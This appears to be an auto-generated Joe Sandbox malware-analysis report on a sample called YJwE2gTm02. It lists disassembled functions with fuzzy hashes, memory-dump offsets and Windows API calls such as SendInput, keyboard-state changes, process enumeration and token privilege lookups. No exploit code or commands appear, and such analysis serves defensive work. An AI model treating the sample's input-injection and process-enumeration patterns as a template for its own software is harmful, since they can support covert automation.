Instruction ID: fd5ddac70830615f6821a93e2ffda71c7ee04d9fca6ff5ff2f9fc2689affc7cc
Opcode Fuzzy Hash: 7d232e506abe22e9ea51b8f80e3cb2db231c82ca4f02ca542ef8ccc46f3ef027
Instruction Fuzzy Hash: 6131DC72A0221AABDF25CF64EC51FAE7BA9EB80710F054268FC04D7250EB35CD50CBA0

Function 009952C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00995352
GetWindowLongW.USER32(?,000000F0), ref: 00995375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00995382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009953A8

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 313961eb7e177ef4316968319f2f8931c05247e7d92629331a884a08e12ab1b5
Instruction ID: 4676e9b811ecf21772ead1849dd248a8f5a14b07b1d39fe6a48fb94094d19a68
Opcode Fuzzy Hash: 313961eb7e177ef4316968319f2f8931c05247e7d92629331a884a08e12ab1b5
Instruction Fuzzy Hash: A4310530A59A08FFEF329E5CCC17BEA3769AB043D0F594102FA00861E0C7B59D80EB41

Function 0096AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0096ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0096AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0096AC74
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0096ACC6

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 149e46ead1c632cf860d478077fda9575f0076aed83329141f5755725e9a732b
Instruction ID: 3b46194e740c7e15fb285f17c2793dd89367d62342e266e73ed851b9e5a2c221
Opcode Fuzzy Hash: 149e46ead1c632cf860d478077fda9575f0076aed83329141f5755725e9a732b
Instruction Fuzzy Hash: 3B310770A047186FEF35CB698C057FE7BA9AB89310F04471AE4C5A21D1C37DDD859B52

Function 00997674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0099769A
GetWindowRect.USER32(?,?), ref: 00997710
PtInRect.USER32(?,?,00998B89), ref: 00997720
MessageBeep.USER32(00000000), ref: 0099778C

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 7f9d1d15cb0b329626166b358b1ec612e5b83b0c1b0bdb5ceb15a018a06a2140
Instruction ID: 6d4dd065a85319fc0c31b92c54ce35a4ffa89e363253b56b53cc24be6d2a12ce
Opcode Fuzzy Hash: 7f9d1d15cb0b329626166b358b1ec612e5b83b0c1b0bdb5ceb15a018a06a2140
Instruction Fuzzy Hash: DA418D35629215EFDF01CFDCD894EA9B7F5FB89314F1540A9E4149B261CB30A981DF90

Function 009916DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 009916EB

Part of subcall function 00963A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00963A57
Part of subcall function 00963A3D: GetCurrentThreadId.KERNEL32 ref: 00963A5E
Part of subcall function 00963A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009625B3), ref: 00963A65

GetCaretPos.USER32(?), ref: 009916FF
ClientToScreen.USER32(00000000,?), ref: 0099174C
GetForegroundWindow.USER32 ref: 00991752

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 4f4f40ef451c5a09b177a199e921854c04d06aea6d719c7770d7bdb6f1e86aa0
Instruction ID: c4d4de8f3cf85b07b7e6820f45312932b4120fbd394b843777330d81851c3978
Opcode Fuzzy Hash: 4f4f40ef451c5a09b177a199e921854c04d06aea6d719c7770d7bdb6f1e86aa0
Instruction Fuzzy Hash: B33132B5D00149AFDB00EFA9C881DAEB7FDFF88304B5484AAE415E7251DB319E45CBA1

Function 0096D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0096D501
Process32FirstW.KERNEL32(00000000,?), ref: 0096D50F
Process32NextW.KERNEL32(00000000,?), ref: 0096D52F
CloseHandle.KERNEL32(00000000), ref: 0096D5DC

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 894ef7696a2b7ba795f8cf30273354a475621e3abf181536350e6162133bedc7
Instruction ID: 86f420e654c26805649330ea5a0ce9887332bb6d828f54cb1917c6cbd232a789
Opcode Fuzzy Hash: 894ef7696a2b7ba795f8cf30273354a475621e3abf181536350e6162133bedc7
Instruction Fuzzy Hash: EA3181715083009FD315EF54C881BAFBBE8EFD9354F14092DF596862A2EB719944CB92

Function 00998FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00919BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00919BB2

GetCursorPos.USER32(?), ref: 00999001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00957711,?,?,?,?,?), ref: 00999016
GetCursorPos.USER32(?), ref: 0099905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00957711,?,?,?), ref: 00999094

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: c17c03164e4c4efb29db2470c49f859c964a94b1acb7f841c2f56e20a4327e52
Instruction ID: b51804c1d8b5e40c867f8aaba025003282f2058a8c9e9b83faa8de260878fadb
Opcode Fuzzy Hash: c17c03164e4c4efb29db2470c49f859c964a94b1acb7f841c2f56e20a4327e52
Instruction Fuzzy Hash: 7B219F35611018FFDF258F9DCC58EEA7BB9EB8A350F04405AF91547261C33299A0EB60

Function 0096D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0099CB68), ref: 0096D2FB
GetLastError.KERNEL32 ref: 0096D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0096D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0099CB68), ref: 0096D376

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 564b811b3dc986eef99394ccd462260d0ada361e69501cdbe4912530f625352e
Instruction ID: 3a9314b6a1bba8165d3fb12e536a226ba17afaf61ff740902833960c8d9114ca
Opcode Fuzzy Hash: 564b811b3dc986eef99394ccd462260d0ada361e69501cdbe4912530f625352e
Instruction Fuzzy Hash: 79214170A0A2019FC710DF28C98196E77E8AF96768F504A1DF4A9C73E1E731D945CB93

Function 00961571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00961014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0096102A
Part of subcall function 00961014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00961036
Part of subcall function 00961014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00961045
Part of subcall function 00961014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0096104C
Part of subcall function 00961014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00961062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009615BE
_memcmp.LIBVCRUNTIME ref: 009615E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00961617
HeapFree.KERNEL32(00000000), ref: 0096161E

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: f72c2a3bf1165b61efebf0f0955be82a7168e6d60dc4dcdc8f916e749bd2f531
Instruction ID: 5e11b1226f6122e26514d14f425835358998919e37d7cf5822828c9d4e2654a4
Opcode Fuzzy Hash: f72c2a3bf1165b61efebf0f0955be82a7168e6d60dc4dcdc8f916e749bd2f531
Instruction Fuzzy Hash: 46217C71E00109EFDF14DFA8C945BEEB7B8EF84354F184459E441AB241E770AA45DBA0

Function 00992782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0099280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00992824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00992832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00992840

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 6958b0b7bd2c98d0ed1b603ba73dc09f832288441112a0fb0aa63e1201353fd2
Instruction ID: 1a639f1612735965f755538ed48a8346b7cb853997bda30ff4aea61e37bf9de4
Opcode Fuzzy Hash: 6958b0b7bd2c98d0ed1b603ba73dc09f832288441112a0fb0aa63e1201353fd2
Instruction Fuzzy Hash: E421D331209111BFDB14DB28CC44FAA7B99AF85324F148159F4268B6E2CB75FC42CBD1

Function 009678F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00968D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0096790A,?,000000FF,?,00968754,00000000,?,0000001C,?,?), ref: 00968D8C
Part of subcall function 00968D7D: lstrcpyW.KERNEL32(00000000,?,?,0096790A,?,000000FF,?,00968754,00000000,?,0000001C,?,?,00000000), ref: 00968DB2
Part of subcall function 00968D7D: lstrcmpiW.KERNEL32(00000000,?,0096790A,?,000000FF,?,00968754,00000000,?,0000001C,?,?), ref: 00968DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00968754,00000000,?,0000001C,?,?,00000000), ref: 00967923
lstrcpyW.KERNEL32(00000000,?,?,00968754,00000000,?,0000001C,?,?,00000000), ref: 00967949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00968754,00000000,?,0000001C,?,?,00000000), ref: 00967984

Strings

cdecl, xrefs: 0096797B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: b568cbb129c4f78ce568217c400ef1c6c6fd1ee059e0a54521af49106a3a636d
Instruction ID: 86a5fa66d8ca85b8273f2d8dbb90976f5f4681fff9a2a6d1201e5082244b0b9e
Opcode Fuzzy Hash: b568cbb129c4f78ce568217c400ef1c6c6fd1ee059e0a54521af49106a3a636d
Instruction Fuzzy Hash: 4611033A204206AFCB259F79CC45E7BB7E9FF85394B40402BF802C72A4EB319801D7A1

Function 00997CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00997D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00997D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00997D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0097B7AD,00000000), ref: 00997D6B

Part of subcall function 00919BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00919BB2

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: fe0731fbdea6649c1ceee20f4c294481b98bfe0f1ba0138015c045bcbbe20629
Instruction ID: 4cbd5bbfde4813b1bdf1454acd135cee59e0a2f894c0b5f1af130486ea4090f1
Opcode Fuzzy Hash: fe0731fbdea6649c1ceee20f4c294481b98bfe0f1ba0138015c045bcbbe20629
Instruction Fuzzy Hash: 0011C072229615AFCF108FACDC04AA67BA8AF45360F154725F839C72F0EB308D91DB50

Function 00995660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 009956BB
_wcslen.LIBCMT ref: 009956CD
_wcslen.LIBCMT ref: 009956D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00995816

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 667cd14e1e36cf47624127a67f0fdde565387bdb168104ea60e3b13914d1fe54
Instruction ID: c0eb22b815f32f08eb1e874a128669cd77067307f7c5e6e57c5a3bc1ecf7839c
Opcode Fuzzy Hash: 667cd14e1e36cf47624127a67f0fdde565387bdb168104ea60e3b13914d1fe54
Instruction Fuzzy Hash: 52113875600618A6DF21DFA9DC81AFF77BCEF41B61F504426F915D6081EB74CA80CB60

Function 00931D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c780b227a44a629927603f71bb17dd6357e66062e54fd614961f648ef02b07f8
Instruction ID: f5cc6ce6a6b3733a520d17f189811c2577310d51fa626b472007b58102db6931
Opcode Fuzzy Hash: c780b227a44a629927603f71bb17dd6357e66062e54fd614961f648ef02b07f8
Instruction Fuzzy Hash: 21016DB220A6167FF6212AB87CC1F67671DDF823B8F350726F531A11E2DB609C405960

Function 00961A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00961A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00961A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00961A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00961A8A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c7f5af6f293f3179c2e41fea761812bf6641b23459ff491fd30cf47bbf1503d3
Instruction ID: 2dce6c5a451627e5bbb0bd7e0d8a38ca8ce69367bc4f90eb393034527f937e93
Opcode Fuzzy Hash: c7f5af6f293f3179c2e41fea761812bf6641b23459ff491fd30cf47bbf1503d3
Instruction Fuzzy Hash: CE11273A901219FFEF10DBA4CD85FADBB78EB08750F240492EA04B7290D6716E50DB94

Function 0096E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0096E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0096E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0096E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0096E24D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: ef4bc99dbb34f65cf26ef9ee708e8921c3b62fe26a61a9e09027a137ed2a4cef
Instruction ID: adb31cbefd4c99a239e2b0309ea5bfed2281b1499ef6e6b3da8a412b1306e1fe
Opcode Fuzzy Hash: ef4bc99dbb34f65cf26ef9ee708e8921c3b62fe26a61a9e09027a137ed2a4cef
Instruction Fuzzy Hash: 8F112BB6918214BFC7019FACDC09A9E7FADAB45310F004216F824E3290D270CD0497A0

Function 0092D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0092CFF9,00000000,00000004,00000000), ref: 0092D218
GetLastError.KERNEL32 ref: 0092D224
__dosmaperr.LIBCMT ref: 0092D22B
ResumeThread.KERNEL32(00000000), ref: 0092D249

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 888a01901a850f49eae42bcf9c00bcdf0221242684a5830e70244da5b073d326
Instruction ID: 1119d82bf56848d015bec04d490d4150bec497dbee9aa01cd61fb101af60dc72
Opcode Fuzzy Hash: 888a01901a850f49eae42bcf9c00bcdf0221242684a5830e70244da5b073d326
Instruction Fuzzy Hash: C101D67640A124BBDB215BA5FC09BAE7A6DDFC2330F100219F935961D4CB718901D7A0

Function 0090600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0090604C
GetStockObject.GDI32(00000011), ref: 00906060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0090606A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 3c667e10f88df17ca207cb0c884fefd9ef317492f575a36f9552cc2ac6d1030a
Instruction ID: 43641ee8eef3bedda3478205e2639b4be996463e7d81cd17433d14903b3877af
Opcode Fuzzy Hash: 3c667e10f88df17ca207cb0c884fefd9ef317492f575a36f9552cc2ac6d1030a
Instruction Fuzzy Hash: 83116DB3546509BFEF124FA5DC54EEABB7DEF083A4F040216FA1452160D7369CA0EBA0

Function 00923B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00923B56

